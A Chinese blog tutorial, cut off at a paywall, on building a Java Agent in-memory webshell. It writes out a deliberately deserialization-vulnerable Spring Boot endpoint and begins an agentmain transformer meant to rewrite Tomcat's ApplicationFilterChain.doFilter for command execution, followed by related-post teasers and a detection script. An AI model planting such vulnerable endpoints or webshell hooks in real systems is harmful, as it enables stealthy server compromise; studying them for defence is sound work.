构造agent类型的内存马(内存马系列篇十三)

最新推荐文章于 2025-02-10 15:32:20 发布
原创 最新推荐文章于 2025-02-10 15:32:20 发布 · 850 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #spring #mybatis

本文介绍了如何利用JAVA Agent技术构建内存马,通过Springboot搭建漏洞环境,演示了利用反序列化漏洞注入内存马的过程。文章详细阐述了编写agent.jar、序列化数据的编写以及注入演示的步骤,涉及字节码修改和命令执行逻辑,是内存马系列的第十三篇。

写在前面

前面我们对JAVA中的Agent技术进行了简单的学习,学习前面的Agent技术是为了给这篇Agent内存马的实现做出铺垫,接下来我们就来看看Agent内存马的实现。

这是内存马系列篇的第十三篇了。

环境搭建

我这里就使用Springboot来搭建一个简单的漏洞环境,对于agent内存马的注入,我这里搭建的是一个具有明显的反序列化漏洞的web服务,通过反序列化漏洞来进行内存马的注入,

IDEA新建一个springboot项目

漏洞代码:

package com.roboterh.vuln.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.ObjectInputStream;

@Controller
public class CommonsCollectionsVuln {
    @ResponseBody
    @RequestMapping("/unser")
    public void unserialize(HttpServletRequest request, HttpServletResponse response) throws Exception {
        java.io.InputStream inputStream =  request.getInputStream();
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        objectInputStream.readObject();
        response.getWriter().println("successfully!!!");
    }

    @ResponseBody
    @RequestMapping("/demo")
    public void demo(HttpServletRequest request, HttpServletResponse response) throws Exception{
        response.getWriter().println("This is a Demo!!!");
    }
}

/unser路由中,获取了请求体的序列化数据,进行反序列化调用;

/demo路由中,返回了一个字符串;

我打算的是通过CC链进行写入。

添加依赖。

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

正式注入

编写agent.jar

有了前面的知识,我们知道在一个运行中的web服务中,对于premain方法的调用方式不太适用,更实用的是通过agentmain方法的调用。

在通过内置的Attach API进行加载之后将会调用这个方法进行动态修改字节码,所以如果我们能够在该方法中实现我们的恶意逻辑,就能够达到我们的目的。

但是怎么才能注入内存马使得能够与用户请求进行交互式的命令执行捏?这里我们是通过类似于前面提到过的在Tomcat
Filter内存马类似的思想,通过利用org.apache.catalina.core.ApplicationFilterChain#doFilter方法。

只是对于前面所提到的Filter型内存马的实现主要是通过动态添加了一个过滤器,通过配置特定的路由和调用对应的doFilter方法进行利用。

这里我们注入agent内存马主要是通过使用前面基础部分讲过的通过javassist框架进行修改doFilter方法的字节码。

非常友好的是在doFilter方法中存在有ServletRequest / ServletResponse实例,可以直接和请求进行交互。

image-20221020210332062.png

好了,接下来看看实现,我们可以简化为以下关键的几步:

  1. 通过addTransformer方法的调用来添加一个实现了java.lang.instrument.ClassFileTransformer接口的一个类。
    image-20221020210557192.png

  2. 之后通过调用retransformClasses方法,来触发前面添加的转换器的transform方法来修改传入的类的对应方法的字节码。

image-20221020210646261.png

首先是一个存在有agentmain方法的AgentDemo类。

import java.lang.instrument.Instrumentation;

public class AgentDemo {
    public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public static void agentmain(String agentArgs, Instrumentation inst) {
        inst.addTransformer(new TransformerDemo(), true);
        Class[] allLoadedClasses = inst.getAllLoadedClasses();
        for (Class aClass : allLoadedClasses) {
            if (aClass.getName().equals(ClassName)) {
                System.out
最低0.47元/天 解锁文章
Jinmindong
关注
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 838
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
第107:国*攻防比赛中一个多层嵌套的java内存的反混淆解密分析过程
ABC_123的博客
11-07 892
Part1 前言大家好,我是ABC_123。一年一度的“大型攻防比赛”已经过去2、3个月了,在此期间陆续收到了多名网友发来的内存样本,ABC_123一直在抽时间进行分析解密工作。现在很多的内存都进行了加密混淆,而且一个比一个复杂;不禁感叹攻防都是相对的,道高一尺魔高一丈。对于内存的解密分析,主要目的除了证明其是内存代码之外,还要找到其流量特征,以备在安全设备中找到含有相应特征的流量,然...
JAVA安全之Java Agent内存
2401_83799022的博客
02-10 1570
Java Agent是一种特殊的Java程序,它允许开发者在Java虚拟机(JVM)启动时或运行期间通过java.lang.instrument包提供的Java标准接口进行代码插桩,从而实现在Java应用程序类加载和运行期间动态修改已加载或者未加载的类,包括类的属性、方法等,而Java Agent内存的实现便是利用了这一特性使其动态修改特定类的特定方法将我们的恶意方法添加进去java.lang.instrument.Instrumentation提供了用于监测运行在JVM中的Java API。
实战分享!spring内存(Controller)构造
MachineGunJoe666
07-05 1121
也不行,再换种方法。这里可以写到一个类中,之前那个相当于两个类,一个主类其中嵌套内部类,再进行build之后,可以看到会生成两个类,因为java中的内部类只是java编译器的概念,对于java的虚拟机而言,它是没有java内部类的概念的,也就是说java中的内部类最后也会被编译成一个独立的class文件。再看第一个参数patterns的构造函数,PatternsRequestCondition是路径匹配,也就是定义访问 controller 的 URL 地址,那么这里写url。
手搓Filter内存构造到利用讲解(内存系列)
顶峰
03-06 1256
今天开始细说一下内存相关的知识点了,我打算成立一个专辑,详细讲讲各种内存的原理,构造,和检测方,同样包括一下tricks。这是专辑的第一,详解了Tomcat下的Filter内存。什么是内存呢?
[Java安全]—Agent内存
Sentiment的博客
08-17 4242
在JVM中运行中,类是通过classLoader加载.class文件进行生成的。在类加载.class文件生成对应的类对象之前,我们可以通过修改.class文件内容,达到修改类的目的。而在 jdk 1.5之后引入了 java.lang.instrument 包,通过 java.lang.instrument 提供的对字节码进行操作的一系列api,而使用这些api开发出的程序就可以称之为java agentagent内存就是利用上述特性修改特定的类或者方法,从而实现恶意方法的注入。Ja...
Java内存简单实现
派大星的博客
12-04 2840
Java内存
Java内存攻防实战——攻击基础
JavaMonsterr的博客
05-23 3709
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个章,分别是攻击基础和防护应用。本攻击基础介绍了Java Servlet
无文件攻击预警:深度解读RAR释放内存的新型攻击链路
本文系统研究无文件攻击与内存技术的融合攻击模式,重点分析基于RAR自解压载荷的隐蔽投递机制及其向内存注入的转化路径。通过剖析SFX模块执行特性、多阶段编码混淆策略及反射式加载等关键技术,揭示了攻击者如何...
Java Agent内存调试系列 ()——反序列化注入agent
热门推荐
leeezp的博客
10-28 30万+
实战中通过反序列化环境一步到位注入内存,相比于之前介绍的agent或filter内存需要上传文件到服务器,反序列化的好处是真正的无文件,只需要发一个包。
Godzilla内存生成插件-Godzilla-Suo5MemShell
SuperherRo的博客
09-04 3645
Godzilla 插件: 一键注入 Suo5 内存
Java Agent内存调试系列 ()
leeezp的博客
10-17 27万+
在JDK1.5以后,引入了包,该包提供了检测 java 程序的 Api,比如用于监控、收集性能信息、诊断问题,通过 java.lang.instrument。在 Instrumentation 中增加了名叫 transformer 的 Class 文件转换器,转换器可以改变二进制流的数据Transformer 可以对未加载的类进行拦截,同时可对已加载的类进行重新拦截,所以根据这个特性我们能够在不影响正常编译的情况实现动态修改字节码,已加载或者未加载的类,包括类的属性、方法。
Java Agent内存
google20的博客
12-25 1143
java Agent内存
Java 内存生成工具-java-memshell-generator-release
SuperherRo的博客
09-04 2885
jMG (Java Memshell Generator) 是一款支持高度自定义的 Java 内存生成工具,提供常见中间件的内存注入支持。
基于Java Agent内存
遇事不决冲冲冲
06-06 2336
在 jdk 1.5 之后引入了 `java.lang.instrument` 包,该包提供了检测 java 程序的 Api,比如用于监控、收集性能信息、诊断问题,通过 `java.lang.instrument` 实现的工具我们称之为 Java AgentJava Agent 支持两种方式进行加载: 实现 premain 方法,在启动时进行加载 (该特性在 jdk 1.5 之后才有) 实现 agentmain 方法,在启动后进行加载 (该特性在 jdk 1.6 之后才有) ...
【网络安全】Agent内存的自动分析与查杀
qkh1234567的博客
05-20 1169
以上是背景,接下来介绍我做了些什么,能够实现怎样的效果不难看出,以上内存查杀手段都是半自动结合人工审核的方式,当检测出内存后检测(同时支持普通内存Java Agent内存的检测)分析(如何确定该类是内存,仅根据恶意类名和注解等信息不完善)查杀(当确定内存存在,如何自动地删除内存并恢复正常业务逻辑)大致看来,实现起来似乎不难,然而实际中遇到了很多坑,接下来我会逐个介绍关于Dump字节码经过我的一些测试,使用sa-jdi库不能保证dump。
java agent内存学习
Shanfenglan's blog
11-12 2272
文章目录1. 什么是java agent补充:一些重要的类ClassFileTransformerVirtualMachineCtMethod2. 利用premain函数实现java agent2.1 执行逻辑2.2 利用javaagent修改加载到jvm前被拦截的类3. 利用agentmain实现javaagent3.1 执行逻辑3.2 参考代码1. 实现连接指定jvm进程的代码:2. 实现agentmain4. 利用agentmain实现内存4.1 修改spring boot中的Filter实现内存
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 718
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3771
java agentJava 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
agent内存的监测思路
最新发布
06-30
检测 agent 内存的技术方案与实现思路主要围绕内存分析、行为监控和通信检测三个方面展开。这些方法通过综合运用静态与动态技术手段,能够有效识别异常行为并定位潜在威胁。 ### 1. 内存分析 内存分析是检测内存的核心手段之一,通过对进程的内存空间进行扫描,可以发现隐藏在内存中的恶意代码。常见的技术包括: - **特征匹配**:基于已知内存的特征库(如特定字符串、代码片段或调用模式),对内存区域进行扫描以匹配可疑内容[^3]。 - **异常行为检测**:利用机器学习算法训练模型,识别与正常程序行为显著偏离的内存操作模式。例如,某些内存会频繁修改自身代码或注入其他进程,这种行为可以通过统计分析发现[^1]。 - **符号执行与模糊测试**:通过符号执行工具对应用程序的内存访问路径进行分析,结合模糊测试生成触发潜在漏洞的输入数据,从而暴露隐藏的内存[^2]。 ### 2. 行为监控 行为监控侧重于捕获运行时的异常活动,尤其是那些与内存相关的典型行为。具体实现方式包括: - **系统调用跟踪**:记录并分析进程的系统调用序列,重点关注涉及内存分配、映射或写入的操作(如 `mmap`、`mprotect` 和 `WriteProcessMemory`)。若发现非预期的调用组合,则可能表明存在内存活动[^3]。 - **线程与钩子检查**:内存通常需要创建新线程或挂钩现有线程来执行恶意代码。通过遍历进程的所有线程,并检查其起始地址是否指向合法模块,可发现异常线程[^1]。 - **DLL/共享库加载监控**:对于 Windows 系统,检查是否有非标准 DLL 被加载;对于 Linux 系统,则监控 `/proc/<pid>/maps` 文件以发现未授权的共享库映射[^2]。 ### 3. 通信检测 内存往往依赖隐蔽的通信渠道传输数据或接收指令,因此通信检测成为另一重要防线。相关策略如下: - **网络流量分析**:使用 IDS/IPS 或流量镜像工具捕获进出目标主机的数据包,重点筛查加密流量中是否存在异常协议或未知目的地 IP 地址。此外,还可以利用深度包检测(DPI)技术解析应用层内容,寻找与内存 C2 服务器交互的痕迹[^3]。 - **WebSocket 监控**:针对采用 WebSocket 协议的现代内存(如示例中的 `WebSocketShell` 类),可通过拦截握手请求并验证其 `Sec-WebSocket-Key` 字段合法性,或者直接阻断非常规路径的 WebSocket 连接。 - **DNS 请求过滤**:部分内存会通过 DNS 隧道外泄敏感信息。部署本地 DNS 缓存服务器并实施严格的域名白名单策略,有助于防范此类攻击[^1]。 ### 示例代码:内存扫描工具的基本框架 以下是一个简单的 Python 脚本,演示如何利用 `pymem` 库读取远程进程内存并搜索特定字节序列(适用于特征匹配场景): ```python import pymem import re def scan_memory(pid, pattern): pm = pymem.Pymem() pm.open_process_from_id(pid) # 获取所有内存区域 regions = pm.list_modules() matches = [] for base, size in regions: try: memory_dump = pm.read_bytes(base, size) for match in re.finditer(pattern, memory_dump): offset = match.start() address = base + offset hexdump = ' '.join(f"{b:02X}" for b in memory_dump[offset:offset+16]) matches.append((address, hexdump)) except Exception as e: continue return matches # 示例:查找包含 "malicious_code_signature" 的内存区域 if __name__ == "__main__": target_pid = 1234 # 替换为目标进程 PID signature = b"malicious_code_signature" results = scan_memory(target_pid, signature) print("Found potential matches:") for addr, dump in results: print(f"Address: 0x{addr:X} | Hexdump: {dump}") ``` 该脚本展示了如何将内存扫描功能集成到自动化检测流程中。实际应用时还需结合更复杂的特征库及误报消除机制。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值